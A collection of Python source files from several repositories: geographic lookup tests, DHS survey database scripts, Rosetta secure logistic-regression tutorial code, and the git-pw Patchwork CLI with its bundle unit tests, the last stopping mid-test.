"score": 3
} |
#### File: gdelt/geo/test_geo.py
```python
import pytest
from shapely.geometry import shape, Point
# from geo.point_in_geojson import point_to_iraq
from geo import point_to_iraq
# @pytest.fixture
def test_nineveh():
p = Point((42.451171875, 35.82672127366604))
properties = point_to_iraq(p)
assert properties['name:en'] == 'Nineveh'
# @pytest.fixture
def test_al_anbar():
# "Al Anbar"
p = Point((41.484375, 32.32427558887655))
properties = point_to_iraq(p)
assert properties['name:en'] == 'Al Anbar'
# @pytest.fixture
def test_diyala():
# Diyala
p = Point((45.120849609375, 33.86129311351553))
properties = point_to_iraq(p)
assert properties['name:en'] == 'Diyala'
``` |
{
"source": "00krishna-tools/pydhs",
"score": 3
} |
#### File: pydhs/scripts/1_prepare_database_for_processing.py
```python
from pydhs.Database import DatabasePsycopg2
from pydhs.Database import DatabaseSqlalchemy
from pydhs.Controller import Controller
from pydhs.controller_stored_procedures import Controller_stored_procedures
def main(database, tablefile):
c = Controller(database)
## function to add table names to each table.
c.action_add_table_name_to_each_database_table(tablefile)
## Function to convert table names to lower case
c.action_set_table_names_to_lowercase()
## Function to convert column names to lower case
c.action_set_field_names_to_lowercase()
def main_births(database, tablefile, variablefile):
c = Controller(database)
c.action_add_list_of_variables_to_all_tables(tablefile, variablefile)
def load_stored_procedures(database):
c = Controller_stored_procedures(database)
c.add_four_digit_function()
c.add_wealth_v190_recode_function()
if __name__ == "__main__":
# execute only if run as a script
main('db_dhs_global', 'tablelists/tablelist_all.csv')
main_births('db_dhs_global', 'tablelists/tablelist_br.csv', 'variable_lists/added_variables_birth_table.csv')
load_stored_procedures('db_dhs_global')
```
#### File: pydhs/scripts/5_merge_wealth_to_births.py
```python
from pydhs.Database import DatabasePsycopg2
from pydhs.Database import DatabaseSqlalchemy
from pydhs.Controller import Controller
def main_merge(database):
c = Controller(database)
c.action_merge_wealth_data_into_birth_table()
c.action_merge_wealth_data_into_birth_table_egypt()
c.action_merge_wealth_data_into_birth_table_philippines()
c.action_merge_wealth_data_into_birth_table_indonesia()
print('merge of wealth and birth data completed.')
if __name__ == "__main__":
main_merge('db_dhs_global')
```
#### File: pydhs/scripts/standardize_cleanup_vars.py
```python
from pydhs.Database import DatabasePsycopg2
from pydhs.Database import DatabaseSqlalchemy
from pydhs.Controller import Controller
def main(database):
c = Controller(database)
c.action_standardize_fields()
if __name__ == "__main__":
# execute only if run as a script
main('db_antonio_india')
```
#### File: pydhs/scripts/test_scripts.py
```python
from pydhs.controller_countrydata import Controller_countrydata
def main_add_country_data(database):
d = Controller_countrydata(database)
#d.action_add_column_iso3_to_intersection_table()
#d.action_update_iso3_codes_for_country_data()
d.get_country_column_names_and_add_to_intersection_table()
print(d.create_query_for_merging_country_data_into_intersection_table())
d.merge_country_data_into_intersection_table()
print('completed addition of country data.')
if __name__ == "__main__":
main_add_country_data('db_dhs_global')
``` |
{
"source": "00make/Rosetta-zh",
"score": 2
} |
#### File: tutorials/code/model_plot.py
```python
import re
import matplotlib.pyplot as plt
import os
import sys
import csv
import tensorflow as tf
import numpy as np
from util import read_dataset, savecsv, loadcsv
import pandas as pd
import argparse
pd.set_option('display.width', 1000)
np.set_printoptions(suppress=True)
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
np.random.seed(0)
def getids(rootdir):
lists = os.listdir(rootdir)
ids = []
for i in range(0, len(lists)):
path = os.path.join(rootdir, lists[i])
if os.path.isdir(path):
continue
filename = lists[i]
        m = re.match(r'(tf|rtt)-(\d+|real|pred)-(W|Y|b)\.csv', filename)
if m is None:
continue
if m[1] == 'tf' and m[3] == 'W':
ids.append(m[2])
ids.sort()
return ids
def cope_diff(tf_file, rtt_file):
val_tf = loadcsv(tf_file).reshape(-1, 1)
val_rtt = loadcsv(rtt_file).reshape(-1, 1)
val_rtt[abs(val_rtt) < 1e-5] = 1e-5
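    # `i` is the epoch index taken from the module-level loop below; each row of the diff table is tagged with it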
epoch_index = np.full(val_tf.shape, i)
diff_div = val_tf/val_rtt
diff_sub = val_tf - val_rtt
diff_percent = (val_tf - val_rtt) / val_rtt
cc = np.hstack((epoch_index, val_tf, val_rtt,
diff_sub, diff_percent, diff_div))
return cc
# ################################################## Args
parser = argparse.ArgumentParser(description="Model Plot")
parser.add_argument('--sname', type=str, help="script name", required=True)
args, unparsed = parser.parse_known_args()
# ##################################################
csvprefix = "./log/" + args.sname
tfdir = "./log/tf-" + args.sname
rttdir = "./log/rtt-" + args.sname
ids = getids(tfdir)
tf_real = tfdir + '/tf-real-Y.csv'
tf_pred = tfdir + '/tf-pred-Y.csv'
rt_pred = rttdir + '/rtt-pred-Y.csv'
tf_W = []
tf_b = []
rt_W = []
rt_b = []
for id_ in ids:
tf_W.append('{}/tf-{}-W.csv'.format(tfdir, id_))
tf_b.append('{}/tf-{}-b.csv'.format(tfdir, id_))
rt_W.append('{}/rtt-{}-W.csv'.format(rttdir, id_))
rt_b.append('{}/rtt-{}-b.csv'.format(rttdir, id_))
# #### weights & biases
diffs = None
wdiffs = None
wdiffsavg = None
bdiffs = None
for i in range(len(ids)):
weights_diff = cope_diff(tf_W[i], rt_W[i])
biases_diff = cope_diff(tf_b[i], rt_b[i])
diff = np.vstack((weights_diff, biases_diff))
if diffs is None:
diffs = diff
wdiffs = weights_diff
bdiffs = biases_diff
wdiffsavg = np.mean(weights_diff, axis=0)
else:
diffs = np.vstack((diffs, diff))
wdiffs = np.vstack((wdiffs, weights_diff))
bdiffs = np.vstack((bdiffs, biases_diff))
wdiffsavg = np.vstack(
(wdiffsavg, np.mean(weights_diff, axis=0)))
# #### save
csvprefix = "./log/" + args.sname
columns = ['epoch', 'tf', 'rtt', 'tf-rtt', '(tf-rtt)/rtt', 'tf/rtt']
# print(diffs[-DIM_NUM-1:, :])
df = pd.DataFrame(diffs, columns=columns)
df.to_csv(csvprefix+"-Wb.csv", index=False, float_format="%.10f")
# predictions
pred_diff = cope_diff(tf_pred, rt_pred)
df = pd.DataFrame(pred_diff, columns=columns)
df.to_csv(csvprefix+"-Y.csv", index=False, float_format="%.10f")
# plot
plt.title("weights tf-rtt")
plt.xlabel("iterations")
plt.plot(wdiffs[:, 3])
plt.savefig(csvprefix+"-W-diff.png")
plt.clf()
plt.title("weights (tf-rtt)/rtt")
plt.xlabel("iterations")
plt.plot(wdiffs[:, 4])
plt.savefig(csvprefix+"-W-diff4.png")
plt.clf()
plt.title("weights tf/rtt")
plt.xlabel("iterations")
plt.plot(wdiffs[:, 5])
plt.savefig(csvprefix+"-W-diff5.png")
plt.clf()
# plot
plt.title("bias tf-rtt")
plt.xlabel("iterations")
plt.plot(bdiffs[:, 3])
plt.savefig(csvprefix+"-b-diff.png")
plt.clf()
plt.title("bias (tf-rtt)/rtt")
plt.xlabel("iterations")
plt.plot(bdiffs[:, 4])
plt.savefig(csvprefix+"-b-diff4.png")
plt.clf()
plt.title("bias tf/rtt")
plt.xlabel("iterations")
plt.plot(bdiffs[:, 5])
plt.savefig(csvprefix+"-b-diff5.png")
plt.clf()
# plot
plt.title("predict tf-rtt")
plt.xlabel("samples")
plt.plot(pred_diff[:, 3])
plt.savefig(csvprefix+"-Y-diff.png")
plt.clf()
plt.title("predict (tf-rtt)/rtt")
plt.xlabel("samples")
plt.plot(pred_diff[:, 4])
plt.savefig(csvprefix+"-Y-diff4.png")
plt.clf()
plt.title("predict tf/rtt")
plt.xlabel("samples")
plt.plot(pred_diff[:, 5])
plt.savefig(csvprefix+"-Y-diff5.png")
plt.clf()
```
#### File: tutorials/code/rtt-ds-lr.py
```python
import argparse
import csv
import math
import os
import sys
import time
import latticex.rosetta as rtt # difference from tensorflow
import numpy as np
import pandas as pd
import tensorflow as tf
rtt.activate("SecureNN")
mpc_player_id = rtt.py_protocol_handler.get_party_id()
print("mpc_player_id:", mpc_player_id)
np.set_printoptions(suppress=True)
np.random.seed(0)
EPOCHES = 1
BATCH_SIZE = 32
learning_rate = 0.03125
DIM_NUM = 11
ROW_NUM = 1279
file_x = ""
file_y = ""
filex_name = "cls_train_x.csv"
filey_name = "cls_train_y.csv"
file_x = "../dsets/P" + str(mpc_player_id) + "/" + filex_name
file_y = "../dsets/P" + str(mpc_player_id) + "/" + filey_name
print("file_x:", file_x)
print("file_y:", file_y)
print("DIM_NUM:", DIM_NUM)
# training dataset
dataset_x0 = rtt.PrivateTextLineDataset(
file_x, data_owner=0) # P0 hold the file_x data
dataset_x1 = rtt.PrivateTextLineDataset(
file_x, data_owner=1) # P1 hold the file_x data
dataset_y = rtt.PrivateTextLineDataset(
file_y, data_owner=0) # P0 hold the file_y data
# dataset decode
def decode_p0(line):
fields = tf.string_split([line], ',').values
fields = rtt.PrivateInput(fields, data_owner=0)
return fields
def decode_p1(line):
fields = tf.string_split([line], ',').values
fields = rtt.PrivateInput(fields, data_owner=1)
return fields
# dataset pipeline
dataset_x0 = dataset_x0 \
.map(decode_p0)\
.batch(BATCH_SIZE)
dataset_x1 = dataset_x1 \
.map(decode_p1)\
.batch(BATCH_SIZE)
dataset_y = dataset_y \
.map(decode_p0)\
.batch(BATCH_SIZE)
# make iterator
iter_x0 = dataset_x0.make_initializable_iterator()
X0 = iter_x0.get_next()
iter_x1 = dataset_x1.make_initializable_iterator()
X1 = iter_x1.get_next()
iter_y = dataset_y.make_initializable_iterator()
Y = iter_y.get_next()
# Join the inputs X from P0 and P1 (the features are split across the two parties)
X = tf.concat([X0, X1], axis=1)
# initialize W & b
W = tf.Variable(tf.zeros([DIM_NUM, 1], dtype=tf.float64))
b = tf.Variable(tf.zeros([1], dtype=tf.float64))
# build lr model
pred_Y = tf.sigmoid(tf.matmul(X, W) + b)
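# manual SGD step for the logistic loss: dL/dW = X^T (pred - y) / batch, dL/db = mean(pred - y)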
dy = pred_Y - Y
dw = tf.matmul(X, dy, transpose_a=True) * (1.0 / BATCH_SIZE)
db = tf.reduce_sum(dy, axis=0) * (1.0 / BATCH_SIZE)
delta_w = dw * learning_rate
delta_b = db * learning_rate
update_w = W - delta_w
update_b = b - delta_b
# update variables
assign_update_w = tf.assign(W, update_w)
assign_update_b = tf.assign(b, update_b)
# training
init = tf.global_variables_initializer()
with tf.Session() as sess:
# init var & iter
sess.run(init)
sess.run([iter_x0.initializer, iter_x1.initializer, iter_y.initializer])
# train
start_time = time.time()
BATCHES = int(ROW_NUM / BATCH_SIZE)
for e in range(EPOCHES):
for i in range(BATCHES):
sess.run([assign_update_w, assign_update_b])
training_use_time = time.time()-start_time
print("training_use_time: {} seconds".format(training_use_time))
print(rtt.get_perf_stats(True))
rtt.deactivate()
```
#### File: tutorials/code/util.py
```python
from sklearn.metrics import mean_absolute_error, mean_squared_log_error, median_absolute_error
from sklearn.metrics import roc_auc_score, roc_curve, precision_recall_curve, auc
from sklearn.metrics import precision_score, accuracy_score, recall_score, f1_score
from sklearn.metrics import mean_squared_error, explained_variance_score, r2_score
import csv
import pandas as pd
import numpy as np
import json
def read_dataset(file_name=None):
if file_name is None:
print("Error! No file name!")
return
res_data = []
with open(file_name, 'r') as f:
cr = csv.reader(f)
for each_r in cr:
curr_r = [np.array([v], dtype=np.float_)[0] for v in each_r]
res_data.append(curr_r)
# print(each_r)
return res_data
def savecsv(file_name, tf_tensor):
"""
only for numpy.narray
"""
np.savetxt(file_name, tf_tensor, fmt="%.10f", delimiter=",")
def loadcsv(file_name):
"""
only for numpy.narray
"""
return np.loadtxt(file_name, delimiter=",")
def pretty(d):
""" d is a dict"""
return json.dumps(d, indent=2, ensure_ascii=False)
def score_logistic_regression(prediction_prob, target, n=0.005, ratio=True,
list_metrics=['tag', 'score_auc', 'score_ks',
'threshold_opt', 'score_accuracy', 'score_precision', 'score_recall',
'score_f1'], tag=''):
fpr, tpr, thresholds = roc_curve(target, prediction_prob, pos_label=1)
score_auc = auc(fpr, tpr)
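    # KS statistic: maximum gap between the cumulative score distributions of the two classes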
crossfreq = pd.crosstab(prediction_prob[:, 0], target[:, 0])
crossdens = crossfreq.cumsum(axis=0) / crossfreq.sum()
crossdens['gap'] = abs(crossdens[0] - crossdens[1])
score_ks = crossdens[crossdens['gap'] ==
crossdens['gap'].max()]['gap'].iloc[0]
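    # operating threshold chosen where |tpr - fpr| peaks (Youden's J)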
threshold_opt = thresholds[np.argmax(np.abs(tpr - fpr))]
prediction = (prediction_prob >= threshold_opt).astype('int64')
score_accuracy = accuracy_score(target, prediction)
score_precision = precision_score(target, prediction)
score_recall = recall_score(target, prediction)
score_f1 = f1_score(target, prediction)
scope = locals()
dict_evaluation_metrix = dict([(i, eval(i, scope)) for i in list_metrics])
return dict_evaluation_metrix
def score_linear_regression(y_pred, y_true, list_metrics=['tag', 'mse', 'rmse', 'mae', 'evs', 'r2'], tag=''):
mse = mean_squared_error(y_true, y_pred)
rmse = np.sqrt(mean_squared_error(y_true, y_pred))
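    # note: 'mae' below is computed with median_absolute_error, i.e. the median (not the mean) absolute error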
mae = median_absolute_error(y_true, y_pred)
evs = explained_variance_score(y_true, y_pred)
r2 = r2_score(y_true, y_pred)
scope = locals()
dict_evaluation_metrix = dict([(i, eval(i, scope)) for i in list_metrics])
return dict_evaluation_metrix
``` |
{
"source": "00-matt/git-pw",
"score": 2
} |
#### File: git-pw/git_pw/shell.py
```python
import click
from git_pw import bundle as bundle_cmds
from git_pw import config
from git_pw import logger
from git_pw import patch as patch_cmds
from git_pw import series as series_cmds
CONF = config.CONF
@click.group()
@click.option('--debug', default=False, is_flag=True,
help="Output more information about what's going on.")
@click.option('--token', metavar='TOKEN', envvar='PW_TOKEN',
help="Authentication token. Defaults to the value of "
"'git config pw.token'.")
@click.option('--username', metavar='USERNAME', envvar='PW_USERNAME',
help="Authentication username. Defaults to the value of "
"'git config pw.username'.")
@click.option('--password', metavar='PASSWORD', envvar='PW_PASSWORD',
help="Authentication password. Defaults to the value of "
"'git config pw.password'.")
@click.option('--server', metavar='SERVER', envvar='PW_SERVER',
help="Patchwork server address/hostname. Defaults to the value "
"of 'git config pw.server'.")
@click.option('--project', metavar='PROJECT', envvar='PW_PROJECT',
help="Patchwork project. Defaults the value of "
"'git config pw.project'.")
@click.version_option()
def cli(debug, token, username, password, server, project):
"""git-pw is a tool for integrating Git with Patchwork.
git-pw can interact with individual patches, complete patch series, and
customized bundles. The three major subcommands are *patch*, *bundle*,
and *series*.
The git-pw utility is a wrapper which makes REST calls to the Patchwork
service. To use git-pw, you must set up your environment by configuring
your Patchwork server URL and either an API token or a username and
password. To configure the server URL, run::
git config pw.server http://pw.server.com/path/to/patchwork
To configure the token, run::
git config pw.token token
Alternatively, you can pass these options via command line parameters or
environment variables.
For more information on any of the commands, simply pass ``--help`` to the
appropriate command.
"""
logger.configure_verbosity(debug)
CONF.debug = debug
CONF.token = token
CONF.username = username
CONF.password = password
CONF.server = server
CONF.project = project
@cli.group()
def patch():
"""Interact with patches.
Patches are the central object in Patchwork structure. A patch
contains both a diff and some metadata, such as the name, the
description, the author, the version of the patch etc. Patchwork
stores not only the patch itself but also various metadata
associated with the email that the patch was parsed from, such as
the message headers or the date the message itself was received.
"""
pass
@cli.group()
def series():
"""Interact with series.
Series are groups of patches, along with an optional cover letter.
Series are mostly dumb containers, though they also contain some
metadata themselves, such as a version (which is inherited by the
patches and cover letter) and a count of the number of patches
found in the series.
"""
pass
@cli.group()
def bundle():
"""Interact with bundles.
Bundles are custom, user-defined groups of patches. Bundles can be
used to keep patch lists, preserving order, for future inclusion in
a tree. There's no restriction of number of patches and they don't
even need to be in the same project. A single patch also can be
part of multiple bundles at the same time. An example of Bundle
usage would be keeping track of the Patches that are ready for
merge to the tree.
"""
pass
patch.add_command(patch_cmds.apply_cmd)
patch.add_command(patch_cmds.show_cmd)
patch.add_command(patch_cmds.download_cmd)
patch.add_command(patch_cmds.update_cmd)
patch.add_command(patch_cmds.list_cmd)
series.add_command(series_cmds.apply_cmd)
series.add_command(series_cmds.show_cmd)
series.add_command(series_cmds.download_cmd)
series.add_command(series_cmds.list_cmd)
bundle.add_command(bundle_cmds.apply_cmd)
bundle.add_command(bundle_cmds.show_cmd)
bundle.add_command(bundle_cmds.download_cmd)
bundle.add_command(bundle_cmds.list_cmd)
bundle.add_command(bundle_cmds.create_cmd)
bundle.add_command(bundle_cmds.update_cmd)
bundle.add_command(bundle_cmds.delete_cmd)
bundle.add_command(bundle_cmds.add_cmd)
bundle.add_command(bundle_cmds.remove_cmd)
```
#### File: git-pw/tests/test_bundle.py
```python
import unittest
from click.testing import CliRunner as CLIRunner
import mock
from git_pw import bundle
@mock.patch('git_pw.api.detail')
@mock.patch('git_pw.api.index')
class GetBundleTestCase(unittest.TestCase):
"""Test the ``_get_bundle`` function."""
def test_get_by_id(self, mock_index, mock_detail):
"""Validate using a number (bundle ID)."""
# not a valid return value (should be a JSON response) but good enough
mock_detail.return_value = 'hello, world'
result = bundle._get_bundle('123')
assert result == mock_detail.return_value, result
mock_index.assert_not_called()
mock_detail.assert_called_once_with('bundles', '123')
def test_get_by_name(self, mock_index, mock_detail):
"""Validate using a string (bundle name)."""
# not a valid return value (should be a JSON response) but good enough
mock_index.return_value = ['hello, world']
result = bundle._get_bundle('test')
assert result == mock_index.return_value[0], result
mock_detail.assert_not_called()
mock_index.assert_called_once_with('bundles', [('q', 'test')])
def test_get_by_name_too_many_matches(self, mock_index, mock_detail):
"""Validate using a string that returns too many results."""
# not valid return values (should be a JSON response) but good enough
mock_index.return_value = ['hello, world', 'uh oh']
with self.assertRaises(SystemExit):
bundle._get_bundle('test')
def test_get_by_name_too_few_matches(self, mock_index, mock_detail):
"""Validate using a string that returns too few (no) results."""
mock_index.return_value = []
with self.assertRaises(SystemExit):
bundle._get_bundle('test')
@mock.patch('git_pw.bundle._get_bundle')
@mock.patch('git_pw.api.download')
@mock.patch('git_pw.utils.git_am')
class ApplyTestCase(unittest.TestCase):
def test_apply_without_args(self, mock_git_am, mock_download,
mock_get_bundle):
"""Validate calling with no arguments."""
rsp = {'mbox': 'http://example.com/api/patches/123/mbox/'}
mock_get_bundle.return_value = rsp
mock_download.return_value = 'test.patch'
runner = CLIRunner()
result = runner.invoke(bundle.apply_cmd, ['123'])
assert result.exit_code == 0, result
mock_get_bundle.assert_called_once_with('123')
mock_download.assert_called_once_with(rsp['mbox'])
mock_git_am.assert_called_once_with(mock_download.return_value, ())
def test_apply_with_args(self, mock_git_am, mock_download,
mock_get_bundle):
"""Validate passthrough of arbitrary arguments to git-am."""
rsp = {'mbox': 'http://example.com/api/patches/123/mbox/'}
mock_get_bundle.return_value = rsp
mock_download.return_value = 'test.patch'
runner = CLIRunner()
result = runner.invoke(bundle.apply_cmd, ['123', '-3'])
assert result.exit_code == 0, result
mock_get_bundle.assert_called_once_with('123')
mock_download.assert_called_once_with(rsp['mbox'])
mock_git_am.assert_called_once_with(mock_download.return_value,
('-3',))
@mock.patch('git_pw.bundle._get_bundle')
@mock.patch('git_pw.api.download')
class DownloadTestCase(unittest.TestCase):
def test_download(self, mock_download, mock_get_bundle):
"""Validate standard behavior."""
rsp = {'mbox': 'http://example.com/api/patches/123/mbox/'}
mock_get_bundle.return_value = rsp
mock_download.return_value = 'test.patch'
runner = CLIRunner()
result = runner.invoke(bundle.download_cmd, ['123'])
assert result.exit_code == 0, result
mock_get_bundle.assert_called_once_with('123')
mock_download.assert_called_once_with(rsp['mbox'], output=None)
def test_download_to_file(self, mock_download, mock_get_bundle):
"""Validate downloading to a file."""
rsp = {'mbox': 'http://example.com/api/patches/123/mbox/'}
mock_get_bundle.return_value = rsp
runner = CLIRunner()
result = runner.invoke(bundle.download_cmd, ['123', 'test.patch'])
assert result.exit_code == 0, result
mock_get_bundle.assert_called_once_with('123')
mock_download.assert_called_once_with(rsp['mbox'], output=mock.ANY)
assert isinstance(
mock_download.call_args[1]['output'], str,
)
class ShowTestCase(unittest.TestCase):
@staticmethod
def _get_bundle(**kwargs):
# Not a complete response but good enough for our purposes
rsp = {
'id': 123,
'date': '2017-01-01 00:00:00',
'web_url': 'https://example.com/bundle/123',
'name': 'Sample bundle',
'owner': {
'username': 'foo',
},
'project': {
'name': 'bar',
},
'patches': [
{
'id': 42,
'date': '2017-01-01 00:00:00',
'web_url': 'https://example.com/project/foo/patch/123/',
'msgid': '<<EMAIL>>',
'list_archive_url': None,
'name': 'Test',
'mbox': 'https://example.com/project/foo/patch/123/mbox/',
},
],
'public': True,
}
rsp.update(**kwargs)
return rsp
@mock.patch('git_pw.bundle._get_bundle')
def test_show(self, mock_get_bundle):
"""Validate standard behavior."""
rsp = self._get_bundle()
mock_get_bundle.return_value = rsp
runner = CLIRunner()
result = runner.invoke(bundle.show_cmd, ['123'])
assert result.exit_code == 0, result
mock_get_bundle.assert_called_once_with('123')
@mock.patch('git_pw.api.version', return_value=(1, 0))
@mock.patch('git_pw.api.index')
@mock.patch('git_pw.utils.echo_via_pager')
class ListTestCase(unittest.TestCase):
@staticmethod
def _get_bundle(**kwargs):
return ShowTestCase._get_bundle(**kwargs)
@staticmethod
def _get_users(**kwargs):
rsp = {
'id': 1,
'username': 'john.doe',
}
rsp.update(**kwargs)
return rsp
def test_list(self, mock_echo, mock_index, mock_version):
"""Validate standard behavior."""
rsp = [self._get_bundle()]
mock_index.return_value = rsp
runner = CLIRunner()
result = runner.invoke(bundle.list_cmd, [])
assert result.exit_code == 0, result
mock_index.assert_called_once_with('bundles', [
('q', None), ('page', None), ('per_page', None),
('order', 'name')])
def test_list_with_formatting(self, mock_echo, mock_index, mock_version):
"""Validate behavior with formatting applied."""
rsp = [self._get_bundle()]
mock_index.return_value = rsp
runner = CLIRunner()
result = runner.invoke(bundle.list_cmd, [
'--format', 'simple', '--column', 'ID', '--column', 'Name'])
assert result.exit_code == 0, result
mock_echo.assert_called_once_with(mock.ANY, ('ID', 'Name'),
fmt='simple')
def test_list_with_filters(self, mock_echo, mock_index, mock_version):
"""Validate behavior with filters applied.
Apply all filters, including those for pagination.
"""
user_rsp = [self._get_users()]
bundle_rsp = [self._get_bundle()]
mock_index.side_effect = [user_rsp, bundle_rsp]
runner = CLIRunner()
result = runner.invoke(bundle.list_cmd, [
'--owner', 'john.doe', '--owner', '2', '--limit', 1, '--page', 1,
'--sort', '-name', 'test'])
assert result.exit_code == 0, result
calls = [
mock.call('users', [('q', 'john.doe')]),
mock.call('bundles', [
('owner', 1), ('owner', '2'), ('q', 'test'), ('page', 1),
('per_page', 1), ('order', '-name')])]
mock_index.assert_has_calls(calls)
@mock.patch('git_pw.api.LOG')
def test_list_with_wildcard_filters(self, mock_log, mock_echo, mock_index,
mock_version):
"""Validate behavior with a "wildcard" filter.
Patchwork API v1.0 did not support multiple filters correctly. Ensure
the user is warned as necessary if a filter has multiple matches.
"""
people_rsp = [self._get_users(), self._get_users()]
bundle_rsp = [self._get_bundle()]
mock_index.side_effect = [people_rsp, bundle_rsp]
runner = CLIRunner()
runner.invoke(bundle.list_cmd, ['--owner', 'john.doe'])
assert mock_log.warning.called
@mock.patch('git_pw.api.LOG')
def test_list_with_multiple_filters(self, mock_log, mock_echo, mock_index,
mock_version):
"""Validate behavior with use of multiple filters.
Patchwork API v1.0 did not support multiple filters correctly. Ensure
the user is warned as necessary if they specify multiple filters.
"""
people_rsp = [self._get_users()]
bundle_rsp = [self._get_bundle()]
mock_index.side_effect = [people_rsp, people_rsp, bundle_rsp]
runner = CLIRunner()
result = runner.invoke(bundle.list_cmd, ['--owner', 'john.doe',
'--owner', 'user.b'])
assert result.exit_code == 0, result
assert mock_log.warning.called
@mock.patch('git_pw.api.LOG')
def test_list_api_v1_1(self, mock_log, mock_echo, mock_index,
mock_version):
"""Validate behavior with API v1.1."""
mock_version.return_value = (1, 1)
user_rsp = [self._get_users()]
bundle_rsp = [self._get_bundle()]
mock_index.side_effect = [user_rsp, bundle_rsp]
runner = CLIRunner()
result = runner.invoke(bundle.list_cmd, [
'--owner', 'john.doe',
'--owner', 'user.b',
'--owner', '<EMAIL>'])
assert result.exit_code == 0, result
# We should have only made a single call to '/users' (for the user
# specified by an email address) since API v1.1 supports filtering with
# usernames natively
calls = [
mock.call('users', [('q', '<EMAIL>')]),
mock.call('bundles', [
('owner', 'john.doe'), ('owner', 'user.b'), ('owner', 1),
('q', None), ('page', None), ('per_page', None),
('order', 'name')])]
mock_index.assert_has_calls(calls)
# We shouldn't see a warning about multiple versions either
assert not mock_log.warning.called
@mock.patch('git_pw.api.version', return_value=(1, 2))
@mock.patch('git_pw.api.create')
@mock.patch('git_pw.utils.echo_via_pager')
class CreateTestCase(unittest.TestCase):
@staticmethod
def _get_bundle(**kwargs):
return ShowTestCase._get_bundle(**kwargs)
def test_create(self, mock_echo, mock_create, mock_version):
"""Validate standard behavior."""
mock_create.return_value = self._get_bundle()
runner = CLIRunner()
result = runner.invoke(bundle.create_cmd, ['hello', '1', '2'])
assert result.exit_code == 0, result
mock_create.assert_called_once_with(
'bundles',
[('name', 'hello'), ('patches', (1, 2)), ('public', False)]
)
def test_create_with_public(self, mock_echo, mock_create, mock_version):
"""Validate behavior with --public option."""
mock_create.return_value = self._get_bundle()
runner = CLIRunner()
result = runner.invoke(bundle.create_cmd, [
'hello', '1', '2', '--public'])
assert result.exit_code == 0, result
mock_create.assert_called_once_with(
'bundles',
[('name', 'hello'), ('patches', (1, 2)), ('public', True)]
)
@mock.patch('git_pw.api.LOG')
def test_create_api_v1_1(
self, mock_log, mock_echo, mock_create, mock_version
):
mock_version.return_value = (1, 1)
runner = CLIRunner()
result = runner.invoke(bundle.create_cmd, ['hello', '1', '2'])
assert result.exit_code == 1, result
assert mock_log.error.called
@mock.patch('git_pw.api.version', return_value=(1, 2))
@mock.patch('git_pw.api.update')
@mock.patch('git_pw.api.detail')
@mock.patch('git_pw.utils.echo_via_pager')
class UpdateTestCase(unittest.TestCase):
@staticmethod
def _get_bundle(**kwargs):
return ShowTestCase._get_bundle(**kwargs)
def test_update(self, mock_echo, mock_detail, mock_update, mock_version):
"""Validate standard behavior."""
mock_update.return_value = self._get_bundle()
runner = CLIRunner()
result = runner.invoke(
bundle.update_cmd,
['1', '--name', 'hello', '--patch', '1', '--patch', '2'],
)
assert result.exit_code == 0, result
mock_detail.assert_not_called()
mock_update.assert_called_once_with(
'bundles', '1', [('name', 'hello'), ('patches', (1, 2))]
)
def test_update_with_public(
self, mock_echo, mock_detail, mock_update, mock_version,
):
"""Validate behavior with --public option."""
mock_update.return_value = self._get_bundle()
runner = CLIRunner()
result = runner.invoke(bundle.update_cmd, ['1', '--public'])
assert result.exit_code == 0, result
mock_detail.assert_not_called()
mock_update.assert_called_once_with('bundles', '1', [('public', True)])
@mock.patch('git_pw.api.LOG')
def test_update_api_v1_1(
self, mock_log, mock_echo, mock_detail, mock_update, mock_version,
):
mock_version.return_value = (1, 1)
runner = CLIRunner()
result = runner.invoke(bundle.update_cmd, ['1', '--name', 'hello'])
assert result.exit_code == 1, result
assert mock_log.error.called
@mock.patch('git_pw.api.version', return_value=(1, 2))
@mock.patch('git_pw.api.delete')
@mock.patch('git_pw.utils.echo_via_pager')
class DeleteTestCase(unittest.TestCase):
def test_delete(self, mock_echo, mock_delete, mock_version):
"""Validate standard behavior."""
mock_delete.return_value = None
runner = CLIRunner()
result = runner.invoke(bundle.delete_cmd, ['hello'])
assert result.exit_code == 0, result
mock_delete.assert_called_once_with('bundles', 'hello')
@mock.patch('git_pw.api.LOG')
def test_delete_api_v1_1(
self, mock_log, mock_echo, mock_delete, mock_version,
):
"""Validate standard behavior."""
mock_version.return_value = (1, 1)
runner = CLIRunner()
result = runner.invoke(bundle.delete_cmd, ['hello'])
assert result.exit_code == 1, result
assert mock_log.error.called
@mock.patch('git_pw.api.version', return_value=(1, 2))
@mock.patch('git_pw.api.update')
@mock.patch('git_pw.api.detail')
@mock.patch('git_pw.utils.echo_via_pager')
class AddTestCase(unittest.TestCase):
@staticmethod
def _get_bundle(**kwargs):
return ShowTestCase._get_bundle(**kwargs)
def test_add(
self, mock_echo, mock_detail, mock_update, mock_version,
):
"""Validate standard behavior."""
mock_detail.return_value = self._get_bundle()
mock_update.return_value = self._get_bundle()
runner = CLIRunner()
result = runner.invoke(bundle.add_cmd, ['1', '1', '2'])
assert result.exit_code == 0, result
mock_detail.assert_called_once_with('bundles', '1')
mock_update.assert_called_once_with(
'bundles', '1', [('patches', (1, 2, 42))],
)
@mock.patch('git_pw.api.LOG')
def test_add_api_v1_1(
self, mock_log, mock_echo, mock_detail, mock_update, mock_version,
):
"""Validate behavior with API v1.1."""
mock_version.return_value = (1, 1)
runner = CLIRunner()
result = runner.invoke(bundle.add_cmd, ['1', '1', '2'])
assert result.exit_code == 1, result
assert mock_log.error.called
@mock.patch('git_pw.api.version', return_value=(1, 2))
@mock.patch('git_pw.api.update')
@mock.patch('git_pw.api.detail')
@mock.patch('git_pw.utils.echo_via_pager')
class RemoveTestCase(unittest.TestCase):
@staticmethod
def _get_bundle(**kwargs):
return ShowTestCase._get_bundle(**kwargs)
def test_remove(
self, mock_echo, mock_detail, mock_update, mock_version,
):
"""Validate standard behavior."""
mock_detail.return_value = self._get_bundle(
patches=[{'id': 1}, {'id': 2}, {'id': 3}],
)
mock_update.return_value = self._get_bundle()
runner = CLIRunner()
result = runner.invoke(bundle.remove_cmd, ['1', '1', '2'])
assert result.exit_code == 0, result
mock_detail.assert_called_once_with('bundles', '1')
mock_update.assert_called_once_with(
'bundles', '1', [('patches', (3,))],
)
@mock.patch('git_pw.bundle.LOG')
def test_remove_empty(
self, mock_log, mock_echo, mock_detail, mock_update, mock_version,
):
"""Validate behavior when deleting would remove all patches."""
mock_detail.return_value = self._get_bundle(
patches=[{'id': 1}, {'id': 2}, {'id': 3}],
)
mock_update.return_value = self._get_bundle()
runner = CLIRunner()
result = runner.invoke(bundle.remove_cmd, ['1', '1', '2', '3'])
